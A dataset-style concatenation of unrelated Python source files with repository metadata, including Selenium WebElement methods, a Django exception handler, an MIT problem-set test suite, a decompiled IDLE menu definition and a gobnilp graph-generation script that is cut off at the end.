"""Finds element within this element's children by partially visible link text.
:Args:
- link_text: The text of the element to partially match on.
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_partial_link_text('Sign')
"""
return self.find_element(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_elements_by_partial_link_text(self, link_text):
"""Finds a list of elements within this element's children by link text.
:Args:
- link_text: The text of the element to partial match on.
:Returns:
- list of webelement - a list with elements if any was found. an
empty list if not
:Usage:
elements = element.find_elements_by_partial_link_text('Sign')
"""
return self.find_elements(by=By.PARTIAL_LINK_TEXT, value=link_text)
def find_element_by_tag_name(self, name):
"""Finds element within this element's children by tag name.
:Args:
- name - name of html tag (eg: h1, a, span)
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_tag_name('h1')
"""
return self.find_element(by=By.TAG_NAME, value=name)
def find_elements_by_tag_name(self, name):
"""Finds a list of elements within this element's children by tag name.
:Args:
- name - name of html tag (eg: h1, a, span)
:Returns:
- list of WebElement - a list with elements if any was found. An
empty list if not
:Usage:
elements = element.find_elements_by_tag_name('h1')
"""
return self.find_elements(by=By.TAG_NAME, value=name)
def find_element_by_xpath(self, xpath):
"""Finds element by xpath.
:Args:
- xpath - xpath of element to locate. "//input[@class='myelement']"
Note: The base path will be relative to this element's location.
This will select the first link under this element.
::
myelement.find_element_by_xpath(".//a")
However, this will select the first link on the page.
::
myelement.find_element_by_xpath("//a")
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_xpath('//div/td[1]')
"""
return self.find_element(by=By.XPATH, value=xpath)
def find_elements_by_xpath(self, xpath):
"""Finds elements within the element by xpath.
:Args:
- xpath - xpath locator string.
Note: The base path will be relative to this element's location.
This will select all links under this element.
::
myelement.find_elements_by_xpath(".//a")
However, this will select all links in the page itself.
::
myelement.find_elements_by_xpath("//a")
:Returns:
- list of WebElement - a list with elements if any was found. An
empty list if not
:Usage:
elements = element.find_elements_by_xpath("//div[contains(@class, 'foo')]")
"""
return self.find_elements(by=By.XPATH, value=xpath)
def find_element_by_class_name(self, name):
"""Finds element within this element's children by class name.
:Args:
- name: The class name of the element to find.
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_class_name('foo')
"""
return self.find_element(by=By.CLASS_NAME, value=name)
def find_elements_by_class_name(self, name):
"""Finds a list of elements within this element's children by class name.
:Args:
- name: The class name of the elements to find.
:Returns:
- list of WebElement - a list with elements if any was found. An
empty list if not
:Usage:
elements = element.find_elements_by_class_name('foo')
"""
return self.find_elements(by=By.CLASS_NAME, value=name)
def find_element_by_css_selector(self, css_selector):
"""Finds element within this element's children by CSS selector.
:Args:
- css_selector - CSS selector string, ex: 'a.nav#home'
:Returns:
- WebElement - the element if it was found
:Raises:
- NoSuchElementException - if the element wasn't found
:Usage:
element = element.find_element_by_css_selector('#foo')
"""
return self.find_element(by=By.CSS_SELECTOR, value=css_selector)
def find_elements_by_css_selector(self, css_selector):
"""Finds a list of elements within this element's children by CSS selector.
:Args:
- css_selector - CSS selector string, ex: 'a.nav#home'
:Returns:
- list of WebElement - a list with elements if any was found. An
empty list if not
:Usage:
elements = element.find_elements_by_css_selector('.foo')
"""
return self.find_elements(by=By.CSS_SELECTOR, value=css_selector)
def send_keys(self, *value):
"""Simulates typing into the element.
:Args:
- value - A string for typing, or setting form fields. For setting
file inputs, this could be a local file path.
Use this to send simple key events or to fill out form fields::
form_textfield = driver.find_element_by_name('username')
form_textfield.send_keys("admin")
This can also be used to set file inputs.
::
file_input = driver.find_element_by_name('profilePic')
file_input.send_keys("path/to/profilepic.gif")
# Generally it's better to wrap the file path in one of the methods
# in os.path to return the actual path to support cross OS testing.
# file_input.send_keys(os.path.abspath("path/to/profilepic.gif"))
"""
# transfer file to another machine only if remote driver is used
# the same behaviour as for java binding
if self.parent._is_remote:
local_file = self.parent.file_detector.is_local_file(*value)
if local_file is not None:
value = self._upload(local_file)
self._execute(Command.SEND_KEYS_TO_ELEMENT,
{'text': "".join(keys_to_typing(value)),
'value': keys_to_typing(value)})
# RenderedWebElement Items
def is_displayed(self):
"""Whether the element is visible to a user."""
# Only go into this conditional for browsers that don't use the atom themselves
if self._w3c:
return self.parent.execute_script(
"return (%s).apply(null, arguments);" % isDisplayed_js,
self)
else:
return self._execute(Command.IS_ELEMENT_DISPLAYED)['value']
@property
def location_once_scrolled_into_view(self):
"""THIS PROPERTY MAY CHANGE WITHOUT WARNING. Use this to discover
where on the screen an element is so that we can click it. This method
should cause the element to be scrolled into view.
Returns the top lefthand corner location on the screen, or ``None`` if
the element is not visible.
"""
if self._w3c:
old_loc = self._execute(Command.W3C_EXECUTE_SCRIPT, {
'script': "arguments[0].scrollIntoView(true); return arguments[0].getBoundingClientRect()",
'args': [self]})['value']
return {"x": round(old_loc['x']),
"y": round(old_loc['y'])}
else:
return self._execute(Command.GET_ELEMENT_LOCATION_ONCE_SCROLLED_INTO_VIEW)['value']
@property
def size(self):
"""The size of the element."""
size = {}
if self._w3c:
size = self._execute(Command.GET_ELEMENT_RECT)['value']
else:
size = self._execute(Command.GET_ELEMENT_SIZE)['value']
new_size = {"height": size["height"],
"width": size["width"]}
return new_size
def value_of_css_property(self, property_name):
"""The value of a CSS property."""
return self._execute(Command.GET_ELEMENT_VALUE_OF_CSS_PROPERTY, {
'propertyName': property_name})['value']
@property
def location(self):
"""The location of the element in the renderable canvas."""
if self._w3c:
old_loc = self._execute(Command.GET_ELEMENT_RECT)['value']
else:
old_loc = self._execute(Command.GET_ELEMENT_LOCATION)['value']
new_loc = {"x": round(old_loc['x']),
"y": round(old_loc['y'])}
return new_loc
@property
def rect(self):
"""A dictionary with the size and location of the element."""
if self._w3c:
return self._execute(Command.GET_ELEMENT_RECT)['value']
else:
rect = self.size.copy()
rect.update(self.location)
return rect
@property
def screenshot_as_base64(self):
"""
Gets the screenshot of the current element as a base64 encoded string.
:Usage:
img_b64 = element.screenshot_as_base64
"""
return self._execute(Command.ELEMENT_SCREENSHOT)['value']
@property
def screenshot_as_png(self):
"""
Gets the screenshot of the current element as a binary data.
:Usage:
element_png = element.screenshot_as_png
"""
return base64.b64decode(self.screenshot_as_base64.encode('ascii'))
def screenshot(self, filename):
"""
Saves a screenshot of the current element to a PNG image file. Returns
False if there is any IOError, else returns True. Use full paths in
your filename.
:Args:
- filename: The full path you wish to save your screenshot to. This
should end with a `.png` extension.
:Usage:
element.screenshot('/Screenshots/foo.png')
"""
if not filename.lower().endswith('.png'):
warnings.warn("name used for saved screenshot does not match file "
"type. It should end with a `.png` extension", UserWarning)
png = self.screenshot_as_png
try:
with open(filename, 'wb') as f:
f.write(png)
except IOError:
return False
finally:
del png
return True
@property
def parent(self):
"""Internal reference to the WebDriver instance this element was found from."""
return self._parent
@property
def id(self):
"""Internal ID used by selenium.
This is mainly for internal use. Simple use cases such as checking if 2
webelements refer to the same element, can be done using ``==``::
if element1 == element2:
print("These 2 are equal")
"""
return self._id
def __eq__(self, element):
return hasattr(element, 'id') and self._id == element.id
def __ne__(self, element):
return not self.__eq__(element)
# Private Methods
def _execute(self, command, params=None):
"""Executes a command against the underlying HTML element.
Args:
command: The name of the command to _execute as a string.
params: A dictionary of named parameters to send with the command.
Returns:
The command's JSON response loaded into a dictionary object.
"""
if not params:
params = {}
params['id'] = self._id
return self._parent.execute(command, params)
def find_element(self, by=By.ID, value=None):
"""
Find an element given a By strategy and locator. Prefer the find_element_by_* methods when
possible.
:Usage:
element = element.find_element(By.ID, 'foo')
:rtype: WebElement
"""
if self._w3c:
if by == By.ID:
by = By.CSS_SELECTOR
value = '[id="%s"]' % value
elif by == By.TAG_NAME:
by = By.CSS_SELECTOR
elif by == By.CLASS_NAME:
by = By.CSS_SELECTOR
value = ".%s" % value
elif by == By.NAME:
by = By.CSS_SELECTOR
value = '[name="%s"]' % value
return self._execute(Command.FIND_CHILD_ELEMENT,
{"using": by, "value": value})['value']
def find_elements(self, by=By.ID, value=None):
"""
Find elements given a By strategy and locator. Prefer the find_elements_by_* methods when
possible.
:Usage:
element = element.find_elements(By.CLASS_NAME, 'foo')
:rtype: list of WebElement
"""
if self._w3c:
if by == By.ID:
by = By.CSS_SELECTOR
value = '[id="%s"]' % value
elif by == By.TAG_NAME:
by = By.CSS_SELECTOR
elif by == By.CLASS_NAME:
by = By.CSS_SELECTOR
value = ".%s" % value
elif by == By.NAME:
by = By.CSS_SELECTOR
value = '[name="%s"]' % value
return self._execute(Command.FIND_CHILD_ELEMENTS,
{"using": by, "value": value})['value']
def __hash__(self):
return int(hashlib.md5(self._id.encode('utf-8')).hexdigest(), 16)
def _upload(self, filename):
fp = IOStream()
zipped = zipfile.ZipFile(fp, 'w', zipfile.ZIP_DEFLATED)
zipped.write(filename, os.path.split(filename)[1])
zipped.close()
content = base64.encodestring(fp.getvalue())
if not isinstance(content, str):
content = content.decode('utf-8')
try:
return self._execute(Command.UPLOAD_FILE, {'file': content})['value']
except WebDriverException as e:
if "Unrecognized command: POST" in e.__str__():
return filename
elif "Command not found: POST " in e.__str__():
return filename
elif '{"status":405,"value":["GET","HEAD","DELETE"]}' in e.__str__():
return filename
else:
raise e
| [
"penglingsen@173.com"
] | penglingsen@173.com |
1e60b179a48982c275554f369e2fd7e4799c2e83 | a48d9c0bee2f1b36dc9338123ced2c79de177a81 | /asterisk_click2dial_crm_claim/__init__.py | f26ba140b1816f84924f9b9ff21e667945c67fd0 | [] | no_license | Sk1f161/OpenERP | aacb0abae52383b12fae08aa631cc0e1ab31b2b8 | 64589e574e513f8925f6cba4d8cab329b34770c7 | refs/heads/master | 2021-01-01T19:24:20.015299 | 2013-09-25T05:33:43 | 2013-09-25T05:33:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,105 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Asterisk Click2Dial CRM Claim module for OpenERP
# Copyright (C) 2012-2013 Akretion (http://www.akretion.com/)
# @author Alexis de Lattre <alexis.delattre@akretion.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import wizard
import asterisk_click2dial_crm_claim
| [
"root@vmi11225.contabo.net"
] | root@vmi11225.contabo.net |
8c1e297407b8673318375c3efa135d1923b019f5 | d613e476959c24ad1666b9346cbc55e0bd635b11 | /leap.py | 078e888b72b485f8f4cce40db9d71495dfa2d0b5 | [] | no_license | forty47seven/with_dahir | 6142e9a19d371322553517a68b598c430d3ba1d2 | 679db406ce2a4cc48aefbdc1b3f6e5f05a998689 | refs/heads/main | 2023-02-02T10:05:38.915512 | 2020-12-21T04:59:29 | 2020-12-21T04:59:29 | 318,107,105 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | #Leap Year
year = int(input('Enter a year: '))
if year % 4 == 0:
if year % 400 == 0:
print (year, 'is a leap year.')
elif year % 100 != 0:
print (year, 'is a leap year.')
elif year % 100 == 0:
print (year, 'is not a leap year.')
else:
print (year, 'is not a leap year.') | [
"noreply@github.com"
] | forty47seven.noreply@github.com |
6d5b03f990530dfb73b703b2e292eee7dd61d6b7 | 640afd312b21e433fbd8a0ac455df3422c2ccd75 | /meiduo_mall/meiduo_mall/utils/exceptions.py | c4fa6186fd1f7c0aed612bde810f04531c61ad72 | [] | no_license | huazaistart/meiduo_mall | b46efec9feabfdc5b13580ddded61deef1e9675b | 569c112c767e687cdb3143154ad1ea36e3b115e2 | refs/heads/master | 2020-03-27T13:03:59.185101 | 2018-08-31T10:40:12 | 2018-08-31T10:40:12 | 146,587,968 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,155 | py | import logging
# django提供的数据库异常
from django.db import DatabaseError
# redis异常
from redis.exceptions import RedisError
from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import exception_handler
# 获取在配置文件中定义的日志器,用来记录日志信息
logger = logging.getLogger('django')
def custom_exception_handler(exc, context):
"""
自定义异常处理,补充处理mysql异常和redis异常
:param exc: 异常对象
:param context: 抛出异常额上下文
:return: Response
"""
# 先调用drf框架的异常处理方法
response = exception_handler(exc, context)
# drf框架处理不了的异常,我们再处理
if not response:
view = context['view'] # 出错的视图,即本次用户访问的视图对象
if isinstance(exc, DatabaseError) or isinstance(exc,RedisError):
# 数据库异常
logger.error('[%s] : %s' % (view, exc))
response = Response({'message': '服务器内部错误'}, status=status.HTTP_507_INSUFFICIENT_STORAGE)
return response
| [
"huazai@example.com"
] | huazai@example.com |
3104093a673dfd6a67d89795536dfbe617b2a3ee | 11b0e2fd331bf9dd6b472393d7075ddeddbaa992 | /PythonScripts/ProblemSet7/ps7_test.py | 60ae97366db71134390fc57c89827c86821e2a8e | [] | no_license | MichaelrMentele/MIT-6.002-Intro-to-CS | 71edd41167db549daa8e07f1833fad237f588e5d | a0ffa8a8ec598a79b92b4a366ea79bdc1c5d8417 | HEAD | 2016-08-12T16:49:41.126772 | 2015-12-29T07:39:39 | 2015-12-29T07:39:39 | 48,765,246 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,925 | py | # 6.00.1x
# Problem Set 7 Test Suite
import unittest
import sys
from ps7 import *
class ProblemSet7NewsStory(unittest.TestCase):
def setUp(self):
pass
def testNewsStoryConstructor(self):
story = NewsStory('', '', '', '', '')
def testNewsStoryGetGuid(self):
story = NewsStory('test guid', 'test title', 'test subject',
'test summary', 'test link')
self.assertEquals(story.getGuid(), 'test guid')
def testNewsStoryGetTitle(self):
story = NewsStory('test guid', 'test title', 'test subject',
'test summary', 'test link')
self.assertEquals(story.getTitle(), 'test title')
def testNewsStoryGetSubject(self):
story = NewsStory('test guid', 'test title', 'test subject',
'test summary', 'test link')
self.assertEquals(story.getSubject(), 'test subject')
def testNewsStoryGetSummary(self):
story = NewsStory('test guid', 'test title', 'test subject',
'test summary', 'test link')
self.assertEquals(story.getSummary(), 'test summary')
def testNewsStoryGetLink(self):
story = NewsStory('test guid', 'test title', 'test subject',
'test summary', 'test link')
self.assertEquals(story.getLink(), 'test link')
class ProblemSet7(unittest.TestCase):
def setUp(self):
class TrueTrigger:
def evaluate(self, story): return True
class FalseTrigger:
def evaluate(self, story): return False
self.tt = TrueTrigger()
self.tt2 = TrueTrigger()
self.ft = FalseTrigger()
self.ft2 = FalseTrigger()
def test1TitleTrigger(self):
koala = NewsStory('', 'Koala bears are soft and cuddly', '', '', '')
pillow = NewsStory('', 'I prefer pillows that are soft.', '', '', '')
soda = NewsStory('', 'Soft drinks are great', '', '', '')
pink = NewsStory('', "Soft's the new pink!", '', '', '')
football = NewsStory('', '"Soft!" he exclaimed as he threw the football', '', '', '')
microsoft = NewsStory('', 'Microsoft announced today that pillows are bad', '', '', '')
nothing = NewsStory('', 'Reuters reports something really boring', '', '' ,'')
caps = NewsStory('', 'soft things are soft', '', '', '')
s1 = TitleTrigger('SOFT')
s2 = TitleTrigger('soft')
for trig in [s1, s2]:
self.assertTrue(trig.evaluate(koala), "TitleTrigger failed to fire when the word appeared in the title")
self.assertTrue(trig.evaluate(pillow), "TitleTrigger failed to fire when the word had punctuation on it")
self.assertTrue(trig.evaluate(soda), "TitleTrigger failed to fire when the case was different")
self.assertTrue(trig.evaluate(pink), "TitleTrigger failed to fire when the word had an apostrophe on it")
self.assertTrue(trig.evaluate(football), "TitleTrigger failed to fire in the presence of lots of punctuation")
self.assertTrue(trig.evaluate(caps), "TitleTrigger is case-sensitive and shouldn't be")
self.assertFalse(trig.evaluate(microsoft), "TitleTrigger fired when the word was present, but not as its own word (e.g. 'soft' and 'Microsoft)'")
self.assertFalse(trig.evaluate(nothing), "TitleTrigger fired when the word wasn't really present in the title")
def test2SubjectTrigger(self):
koala = NewsStory('', '', 'Koala bears are soft and cuddly', '', '')
pillow = NewsStory('', '', 'I prefer pillows that are soft.', '', '')
soda = NewsStory('', '', 'Soft drinks are great', '', '')
pink = NewsStory('', '', "Soft's the new pink!", '', '')
football = NewsStory('', '', '"Soft!" he exclaimed as he threw the football', '', '')
microsoft = NewsStory('', '', 'Microsoft announced today that pillows are bad', '', '')
nothing = NewsStory('', '', 'Reuters reports something really boring', '', '')
caps = NewsStory('', '', 'soft things are soft', '', '')
s1 = SubjectTrigger('SOFT')
s2 = SubjectTrigger('soft')
for trig in [s1, s2]:
self.assertTrue(trig.evaluate(koala), "SubjectTrigger failed to fire when the word appeared in the subject")
self.assertTrue(trig.evaluate(pillow), "SubjectTrigger failed to fire when the word had punctuation on it")
self.assertTrue(trig.evaluate(soda), "SubjectTrigger failed to fire when the case was different")
self.assertTrue(trig.evaluate(pink), "SubjectTrigger failed to fire when the word had an apostrophe on it")
self.assertTrue(trig.evaluate(football), "SubjectTrigger failed to fire in the presence of lots of punctuation")
self.assertTrue(trig.evaluate(caps), "SubjectTrigger is case-sensitive and shouldn't be")
self.assertFalse(trig.evaluate(microsoft), "SubjectTrigger fired when the word was present, but not as its own word (e.g. 'soft' and 'Microsoft)'")
self.assertFalse(trig.evaluate(nothing), "SubjectTrigger fired when the word wasn't really present in the subject")
def test3SummaryTrigger(self):
koala = NewsStory('', '', '', 'Koala bears are soft and cuddly', '')
pillow = NewsStory('', '', '', 'I prefer pillows that are soft.', '')
soda = NewsStory('', '', '', 'Soft drinks are great', '')
pink = NewsStory('', '', '', "Soft's the new pink!", '')
football = NewsStory('', '', '', '"Soft!" he exclaimed as he threw the football', '')
microsoft = NewsStory('', '', '', 'Microsoft announced today that pillows are bad', '')
nothing = NewsStory('', '', '', 'Reuters reports something really boring', '')
caps = NewsStory('', '', '', 'soft things are soft', '')
s1 = SummaryTrigger('SOFT')
s2 = SummaryTrigger('soft')
for trig in [s1, s2]:
self.assertTrue(trig.evaluate(koala), "SummaryTrigger failed to fire when the word appeared in the summary.")
self.assertTrue(trig.evaluate(pillow), "SummaryTrigger failed to fire when the word had punctuation on it")
self.assertTrue(trig.evaluate(soda), "SummaryTrigger failed to fire when the case was different")
self.assertTrue(trig.evaluate(pink), "SummaryTrigger failed to fire when the word had an apostrophe on it")
self.assertTrue(trig.evaluate(football), "SummaryTrigger failed to fire in the presence of lots of punctuation")
self.assertTrue(trig.evaluate(caps), "SummaryTrigger is case-sensitive and shouldn't be")
self.assertFalse(trig.evaluate(microsoft), "SummaryTrigger fired when the word was present, but not as its own word (e.g. 'soft' and 'Microsoft)'")
self.assertFalse(trig.evaluate(nothing), "SummaryTrigger fired when the word wasn't really present in the summary")
def test4NotTrigger(self):
n = NotTrigger(self.tt)
b = NewsStory("guid", "title", "subj", "summary", "link")
self.assertFalse(n.evaluate(b), "A NOT trigger applied to 'always true' DID NOT return false")
y = NotTrigger(self.ft)
self.assertTrue(y.evaluate(b), "A NOT trigger applied to 'always false' DID NOT return true")
def test5AndTrigger(self):
yy = AndTrigger(self.tt, self.tt2)
yn = AndTrigger(self.tt, self.ft)
ny = AndTrigger(self.ft, self.tt)
nn = AndTrigger(self.ft, self.ft2)
b = NewsStory("guid", "title", "subj", "summary", "link")
self.assertTrue(yy.evaluate(b), "AND of 'always true' and 'always true' should be true")
self.assertFalse(yn.evaluate(b), "AND of 'always true' and 'always false' should be false")
self.assertFalse(ny.evaluate(b), "AND of 'always false' and 'always true' should be false")
self.assertFalse(nn.evaluate(b), "AND of 'always false' and 'always false' should be false")
def test6OrTrigger(self):
yy = OrTrigger(self.tt, self.tt2)
yn = OrTrigger(self.tt, self.ft)
ny = OrTrigger(self.ft, self.tt)
nn = OrTrigger(self.ft, self.ft2)
b = NewsStory("guid", "title", "subj", "summary", "link")
self.assertTrue(yy.evaluate(b), "OR of 'always true' and 'always true' should be true")
self.assertTrue(yn.evaluate(b), "OR of 'always true' and 'always false' should be true")
self.assertTrue(ny.evaluate(b), "OR of 'always false' and 'always true' should be true")
self.assertFalse(nn.evaluate(b), "OR of 'always false' and 'always false' should be false")
def test7PhraseTrigger(self):
pt = PhraseTrigger("New York City")
a = NewsStory('', "asfdNew York Cityasfdasdfasdf", '', '', '')
b = NewsStory('', '', "asdfasfdNew York Cityasfdasdfasdf", '', '')
c = NewsStory('', '', '', "asdfasfdNew York Cityasfdasdfasdf", '')
noa = NewsStory('', "something something new york city", '', '', '')
nob = NewsStory('', '', "something something new york city", '', '')
noc = NewsStory('', '', '', "something something new york city", '')
self.assertTrue(pt.evaluate(a), "PhraseTrigger doesn't find phrase in title")
self.assertTrue(pt.evaluate(b), "PhraseTrigger doesn't find phrase in subject")
self.assertTrue(pt.evaluate(c), "PhraseTrigger doesn't find phrase in summary")
for s in [noa, nob, noc]:
self.assertFalse(pt.evaluate(s), "PhraseTrigger is case-insensitive, and shouldn't be")
def test8FilterStories(self):
pt = PhraseTrigger("New York City")
a = NewsStory('', "asfdNew York Cityasfdasdfasdf", '', '', '')
b = NewsStory('', '', "asdfasfdNew York Cityasfdasdfasdf", '', '')
c = NewsStory('', '', '', "asdfasfdNew York Cityasfdasdfasdf", '')
noa = NewsStory('', "something something new york city", '', '', '')
nob = NewsStory('', '', "something something new york city", '', '')
noc = NewsStory('', '', '', "something something new york city", '')
triggers = [pt, self.tt, self.ft]
stories = [a, b, c, noa, nob, noc]
filteredStories = filterStories(stories, triggers)
print filteredStories
for story in stories:
self.assertTrue(story in filteredStories)
filteredStories = filterStories(stories, [self.ft])
self.assertEquals(len(filteredStories), 0)
def test8FilterStories2(self):
pt = PhraseTrigger("New York City")
a = NewsStory('', "asfdNew York Cityasfdasdfasdf", '', '', '')
b = NewsStory('', '', "asdfasfdNew York Cityasfdasdfasdf", '', '')
c = NewsStory('', '', '', "asdfasfdNew York Cityasfdasdfasdf", '')
noa = NewsStory('', "something something new york city", '', '', '')
nob = NewsStory('', '', "something something new york city", '', '')
noc = NewsStory('', '', '', "something something new york city", '')
class MatchTrigger(Trigger):
def __init__(self, story):
self.story = story
def evaluate(self, story):
return story == self.story
triggers = [MatchTrigger(a), MatchTrigger(nob)]
stories = [a, b, c, noa, nob, noc]
filteredStories = filterStories(stories, triggers)
self.assertTrue(a in filteredStories)
self.assertTrue(nob in filteredStories)
self.assertEquals(2, len(filteredStories))
if __name__ == "__main__":
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(ProblemSet7NewsStory))
suite.addTest(unittest.makeSuite(ProblemSet7))
unittest.TextTestRunner(verbosity=2).run(suite)
unittest.TextTestRunner(verbosity=2, stream=sys.stdout).run(suite)
| [
"michaelrmentele@gmail.com"
] | michaelrmentele@gmail.com |
9d5d983d5ff01859848e01029c4cf4bd7a80dd09 | 730a0291d90bf220d162791287e422bc4225d164 | /pymodel/__init__.py | 4963a551029dcecb2c1fe1c933778d788cf10017 | [
"BSD-3-Clause"
] | permissive | jon-jacky/PyModel | 27442d062e615bd0bf1bd16d86ae56cc4d3dc443 | 457ea284ea20703885f8e57fa5c1891051be9b03 | refs/heads/master | 2022-11-02T14:08:47.012661 | 2022-10-16T09:47:53 | 2022-10-16T09:47:53 | 2,034,133 | 75 | 36 | NOASSERTION | 2021-07-11T21:15:08 | 2011-07-12T04:23:02 | Python | UTF-8 | Python | false | false | 87 | py | """
Make this directory a package so it can be installed with one line in setup.py
"""
| [
"jon@u.washington.edu"
] | jon@u.washington.edu |
a771d28bdbf0a941f858c851bbe836950980bc83 | 2fd0c65aa0f72133f773dac5d9a5c48fe9e26fac | /Python/Core/Lib/idlelib/Bindings.py | 896d83102673640507f98caa05d20c390622944e | [] | no_license | FingerLeakers/DanderSpritz_docs | f5d2430e0b86b1b2f0684f02ddd4fa973a5a7364 | d96b6a71c039b329f9f81544f645857c75360e7f | refs/heads/master | 2021-01-25T13:05:51.732149 | 2018-03-08T01:22:49 | 2018-03-08T01:22:49 | 123,527,268 | 2 | 0 | null | 2018-03-02T03:48:31 | 2018-03-02T03:48:30 | null | UTF-8 | Python | false | false | 3,003 | py | # uncompyle6 version 2.9.10
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.10 (default, Feb 6 2017, 23:53:20)
# [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.34)]
# Embedded file name: Bindings.py
"""Define the menu contents, hotkeys, and event bindings.
There is additional configuration information in the EditorWindow class (and
subclasses): the menus are created there based on the menu_specs (class)
variable, and menus not created are silently skipped in the code here. This
makes it possible, for example, to define a Debug menu which is only present in
the PythonShell window, and a Format menu which is only present in the Editor
windows.
"""
import sys
from idlelib.configHandler import idleConf
from idlelib import macosxSupport
menudefs = [
(
'file',
[
('_New Window', '<<open-new-window>>'),
('_Open...', '<<open-window-from-file>>'),
('Open _Module...', '<<open-module>>'),
('Class _Browser', '<<open-class-browser>>'),
('_Path Browser', '<<open-path-browser>>'),
None,
('_Save', '<<save-window>>'),
('Save _As...', '<<save-window-as-file>>'),
('Save Cop_y As...', '<<save-copy-of-window-as-file>>'),
None,
('Prin_t Window', '<<print-window>>'),
None,
('_Close', '<<close-window>>'),
('E_xit', '<<close-all-windows>>')]),
(
'edit',
[
('_Undo', '<<undo>>'),
('_Redo', '<<redo>>'),
None,
('Cu_t', '<<cut>>'),
('_Copy', '<<copy>>'),
('_Paste', '<<paste>>'),
('Select _All', '<<select-all>>'),
None,
('_Find...', '<<find>>'),
('Find A_gain', '<<find-again>>'),
('Find _Selection', '<<find-selection>>'),
('Find in Files...', '<<find-in-files>>'),
('R_eplace...', '<<replace>>'),
('Go to _Line', '<<goto-line>>')]),
(
'format',
[
('_Indent Region', '<<indent-region>>'),
('_Dedent Region', '<<dedent-region>>'),
('Comment _Out Region', '<<comment-region>>'),
('U_ncomment Region', '<<uncomment-region>>'),
('Tabify Region', '<<tabify-region>>'),
('Untabify Region', '<<untabify-region>>'),
('Toggle Tabs', '<<toggle-tabs>>'),
('New Indent Width', '<<change-indentwidth>>')]),
(
'run',
[
('Python Shell', '<<open-python-shell>>')]),
(
'shell',
[
('_View Last Restart', '<<view-restart>>'),
('_Restart Shell', '<<restart-shell>>')]),
(
'debug',
[
('_Go to File/Line', '<<goto-file-line>>'),
('!_Debugger', '<<toggle-debugger>>'),
('_Stack Viewer', '<<open-stack-viewer>>'),
('!_Auto-open Stack Viewer', '<<toggle-jit-stack-viewer>>')]),
(
'options',
[
('_Configure IDLE...', '<<open-config-dialog>>'),
None]),
(
'help',
[
('_About IDLE', '<<about-idle>>'),
None,
('_IDLE Help', '<<help>>'),
('Python _Docs', '<<python-docs>>')])]
if macosxSupport.runningAsOSXApp():
quitItem = menudefs[0][1][-1]
closeItem = menudefs[0][1][-2]
del menudefs[0][1][-3:]
menudefs[0][1].insert(6, closeItem)
del menudefs[-1][1][0:2]
default_keydefs = idleConf.GetCurrentKeySet()
del sys | [
"francisck@protonmail.ch"
] | francisck@protonmail.ch |
5c3a7290e7bd2aea62c060b4775225461bdbd8fd | 1fe5186cc38cbf6797eb0efcbca3ba4e98ab6ab1 | /experiment_2/generate_gobnilp_graphs.py | 8c67a4445ac0075da96239f03509d0ae5efac97b | [] | no_license | Broshen/defect_prediction_analysis | 9498a38862f1fb66735b525f06d1667a4bab9444 | 1cdb51e7882cf5c57a41ac29d661893b6ce2fa72 | refs/heads/master | 2020-03-18T04:49:17.943866 | 2018-07-26T16:53:34 | 2018-07-26T16:53:34 | 134,308,362 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,466 | py | # IMPORTANT: READ ME
# This python script is run on the student.linux environments,
# since it runs the gobnilp executables, which was set up there
# (it's a pain in the ass to set up on windows)
# The student linux environments only have Python 2.7
# Hence, this script is in Python 2.7!!!!
# (whereas other scripts are all in python 3)
# !!!!!THIS PYTHON SCRIPT IS WRITTEN IN PYTHON 2.7!!!!!
import os
import subprocess
import sys
GOBNILP_EXECUTABLE_PATH = "../gobnilp.spx"
GOBNILP_SETTINGS_PATH = "./gobnilp.set"
INPUT_FILE_PATH = '../../change_burst_data-master/weekly/packages/gobnilp_formatted/'
def generateDotFiles(file, output_folder):
out_name=file.replace("_incl_bugs-gobnilp_formatted.csv", "")
output_folder+=out_name+"/"
if not os.path.exists(output_folder):
os.makedirs(output_folder)
subprocess.call([GOBNILP_EXECUTABLE_PATH, "-f=dat", "-g="+GOBNILP_SETTINGS_PATH, INPUT_FILE_PATH+file])
with open(output_folder+out_name+"_scores", "w+") as scorefile:
# iterate through results and move & rename to appropriate folder
for file in os.listdir("./"):
if file.startswith("bn") and file.endswith("dot"):
subprocess.call(["mv", file, output_folder+out_name+"_"+file])
elif file.startswith("scoreandtime_"):
rank = file.replace("scoreandtime_","")
with open(file, "r") as f:
score = f.read().split()[0]
scorefile.write(rank+"," +score+"\n")
os.remove(file)
def generateAllFiles():
output_folder=INPUT_FILE_PATH.replace("../../change_burst_data-master", "./bn_graphs").replace('gobnilp_formatted/', '')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
for file in os.listdir(INPUT_FILE_PATH):
if "_incl_bugs-gobnilp_formatted.csv" in file:
generateDotFiles(file, output_folder)
def generateFromFilesWithPrefix(prefix):
output_folder=INPUT_FILE_PATH.replace("../../change_burst_data-master", "./bn_graphs").replace('gobnilp_formatted/', '')
if not os.path.exists(output_folder):
os.makedirs(output_folder)
for file in os.listdir(INPUT_FILE_PATH):
if (INPUT_FILE_PATH + file).startswith(prefix):
generateDotFiles(file, output_folder)
try:
print("GENERATING FROM FILES BEGINNING WITH: " + sys.argv[1])
